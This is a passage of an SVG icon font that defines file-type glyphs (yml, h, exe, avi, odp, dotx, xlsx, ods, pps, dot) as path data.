<glyph unicode="&#xed15;" glyph-name="document-file-yml2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM480 320v-96h-32v96l-64 96v32h32v-32l48-72 48 72v32h32v-32l-64-96zM656 352l48 96h32v-224h-32v160l-32-64h-32l-32 64v-160h-32v224h32l48-96zM928 256v-32h-160v224h32v-192h128z" />
<glyph unicode="&#xed16;" glyph-name="document-file-h" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM704 352v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96z" />
<glyph unicode="&#xed17;" glyph-name="document-file-h2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM704 352v96h32v-224h-32v96h-96v-96h-32v224h32v-96h96z" />
<glyph unicode="&#xed18;" glyph-name="document-file-exe" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM416 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM640 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM800 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96z" />
<glyph unicode="&#xed19;" glyph-name="document-file-exe2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM416 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96zM640 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM800 320v-64h128v-32h-160v224h160v-32h-128v-64h96v-32h-96z" />
<glyph unicode="&#xed1a;" glyph-name="document-file-avi" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM544 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM479.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM688 280l48 168h32l-64-224h-32l-64 224h32l48-168zM832 416v-160h-32v-32h96v32h-32v160h32v32h-96v-32h32z" />
<glyph unicode="&#xed1b;" glyph-name="document-file-avi2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512c-35.25 0-63.826-28.806-63.826-63.745v-224.511c0-35.205 28.875-63.745 63.826-63.745h544.348c35.25 0 63.826 28.806 63.826 63.745v224.511c0 35.205-28.875 63.745-63.826 63.745h-544.348zM544 320h-96v-96h-32v160c0 35.593 28.724 64 64.156 64h31.688c35.551 0 64.156-28.654 64.156-64v-160h-32v96zM479.967 416c-17.655 0-31.967-14.204-31.967-32v-32h96v32c0 17.673-14.165 32-31.967 32h-32.067zM688 280l48 168h32l-64-224h-32l-64 224h32l48-168zM832 416h-32v32h96v-32h-32v-160h32v-32h-96v32h32v160z" />
<glyph unicode="&#xed1c;" glyph-name="document-file-odp" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM768 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xed1d;" glyph-name="document-file-odp2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM768 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM800 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067z" />
<glyph unicode="&#xed1e;" glyph-name="document-file-dotx" d="M608 544h320.183c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-320.183v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-384.183c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961h384.183v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM192 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM224 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xed1f;" glyph-name="document-file-dotx2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-415.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h415.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM192.235 512h735.531c35.488 0 64.235-28.539 64.235-63.745v-224.511c0-34.939-28.759-63.745-64.235-63.745h-735.531c-35.488 0-64.235 28.539-64.235 63.745v224.511c0 34.939 28.759 63.745 64.235 63.745zM192 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM224 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM640 416v-192h32v192h64v32h-160v-32h64zM832 336l-64-112h32l48 84 48-84h32l-64 112 64 112h-32l-48-84-48 84h-32l64-112z" />
<glyph unicode="&#xed20;" glyph-name="document-file-xlsx" d="M608 544h320.183c52.919 0 95.817-42.963 95.817-95.961v-224.078c0-53.009-42.899-95.961-95.817-95.961h-320.183v-64.295c0-34.963-28.617-63.705-63.918-63.705h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.693 64.235 64.088 64.235h351.912l192-224v-96zM576 128h-384.183c-52.919 0-95.817 42.963-95.817 95.961v224.078c0 53.009 42.899 95.961 95.817 95.961h384.183v64h-128.067c-35.309 0-63.933 28.37-63.933 64.189v159.811h-320.142c-17.595 0-31.858-14.568-31.858-31.855v-736.291c0-17.593 14.551-31.855 31.999-31.855h480.003c17.672 0 31.999 14.238 31.999 31.789v64.211zM416 816v-143.719c0-17.828 14.421-32.281 31.896-32.281h118.503l-150.398 176zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM256 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM544 256v-32h-160v224h32v-192h128zM640.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688zM832 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xed21;" glyph-name="document-file-xlsx2" d="M608 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-415.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h415.781zM416 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM192.235 512c-35.476 0-64.235-28.806-64.235-63.745v-224.511c0-35.205 28.747-63.745 64.235-63.745h735.531c35.476 0 64.235 28.806 64.235 63.745v224.511c0 35.205-28.747 63.745-64.235 63.745h-735.531zM256 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112zM544 256v-32h-160v224h32v-192h128zM640.156 448h31.688c35.551 0 64.156-28.654 64.156-64h-32c0 17.498-14.312 32-31.967 32h-32.067c-17.801 0-31.967-14.327-31.967-32 0-17.796 14.461-32 32.3-32h31.7c35.593 0 64-28.654 64-64 0-35.593-28.724-64-64.156-64h-31.688c-35.551 0-64.156 28.669-64.156 64.035v0.184h32v-0.362c0-17.256 14.312-31.857 31.967-31.857h32.067c17.801 0 31.967 14.327 31.967 32 0 17.796-14.461 32-32.3 32h-31.7c-35.593 0-64 28.654-64 64 0 35.593 28.724 64 64.156 64zM832 336l-64 112h32l48-84 48 84h32l-64-112 64-112h-32l-48 84-48-84h-32l64 112z" />
<glyph unicode="&#xed22;" glyph-name="document-file-ods" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM576 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed23;" glyph-name="document-file-ods2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM448.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM447.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM576 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM608 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed24;" glyph-name="document-file-pps" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM384 384v64h95.844c35.551 0 64.156-28.654 64.156-64 0-35.593-28.724-64-64.156-64h-63.844v-96h-32v160zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed25;" glyph-name="document-file-pps2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM576 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM608 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM384 384v-160h32v96h63.844c35.432 0 64.156 28.407 64.156 64 0 35.346-28.605 64-64.156 64h-95.844v-64zM416 416v-64h64.033c17.655 0 31.967 14.204 31.967 32 0 17.673-14.165 32-31.967 32h-64.033zM832.156 448c-35.432 0-64.156-28.407-64.156-64 0-35.346 28.407-64 64-64h31.7c17.839 0 32.3-14.204 32.3-32 0-17.673-14.165-32-31.967-32h-32.067c-17.655 0-31.967 14.601-31.967 31.857v0.362h-32v-0.184c0-35.365 28.605-64.035 64.156-64.035h31.688c35.432 0 64.156 28.407 64.156 64 0 35.346-28.407 64-64 64h-31.7c-17.839 0-32.3 14.204-32.3 32 0 17.673 14.165 32 31.967 32h32.067c17.655 0 31.967-14.502 31.967-32h32c0 35.346-28.605 64-64.156 64h-31.688z" />
<glyph unicode="&#xed26;" glyph-name="document-file-dot" d="M672 544v96l-192 224h-351.912c-35.395 0-64.088-28.747-64.088-64.235v-735.531c0-35.476 28.51-64.235 63.918-64.235h480.165c35.301 0 63.918 28.743 63.918 63.705v64.295h255.781c53.14 0 96.219 42.952 96.219 95.961v224.078c0 52.998-42.752 95.961-96.219 95.961h-255.781zM640 128v-64.211c0-17.55-14.326-31.789-31.999-31.789h-480.003c-17.448 0-31.999 14.262-31.999 31.855v736.291c0 17.286 14.264 31.855 31.858 31.855h320.142v-159.811c0-35.82 28.624-64.189 63.933-64.189h128.067v-64h-255.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h255.781zM480 816l150.398-176h-118.503c-17.475 0-31.896 14.453-31.896 32.281v143.719zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448h95.844c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-95.844v224zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640.156 448h31.688c35.551 0 64.156-28.739 64.156-64.189v-95.621c0-35.82-28.724-64.189-64.156-64.189h-31.688c-35.551 0-64.156 28.739-64.156 64.189v95.621c0 35.82 28.724 64.189 64.156 64.189zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM832 416v-192h32v192h64v32h-160v-32h64z" />
<glyph unicode="&#xed27;" glyph-name="document-file-dot2" d="M672 128v-64.082c0-35.408-28.617-63.918-63.918-63.918h-480.165c-35.408 0-63.918 28.759-63.918 64.235v735.531c0 35.488 28.776 64.235 64.273 64.235h319.727v-192.061c0-35.565 28.739-63.939 64.189-63.939h159.811v-64h-287.781c-53.14 0-96.219-42.952-96.219-95.961v-224.078c0-52.998 42.752-95.961 96.219-95.961h287.781zM480 864v-191.906c0-17.725 14.431-32.094 31.705-32.094h160.295l-192 224zM383.826 512h544.348c34.951 0 63.826-28.539 63.826-63.745v-224.511c0-34.939-28.576-63.745-63.826-63.745h-544.348c-34.951 0-63.826 28.539-63.826 63.745v224.511c0 34.939 28.576 63.745 63.826 63.745zM384 448v-224h95.844c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-95.844zM416 416v-160h64.033c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-64.033zM640.156 448c-35.432 0-64.156-28.37-64.156-64.189v-95.621c0-35.451 28.605-64.189 64.156-64.189h31.688c35.432 0 64.156 28.37 64.156 64.189v95.621c0 35.451-28.605 64.189-64.156 64.189h-31.688zM639.967 416c-17.655 0-31.967-14.199-31.967-31.994v-96.012c0-17.67 14.165-31.994 31.967-31.994h32.067c17.655 0 31.967 14.199 31.967 31.994v96.012c0 17.67-14.165 31.994-31.967 31.994h-32.067zM832 416v-192h32v192h64v32h-160v-32h64z" />
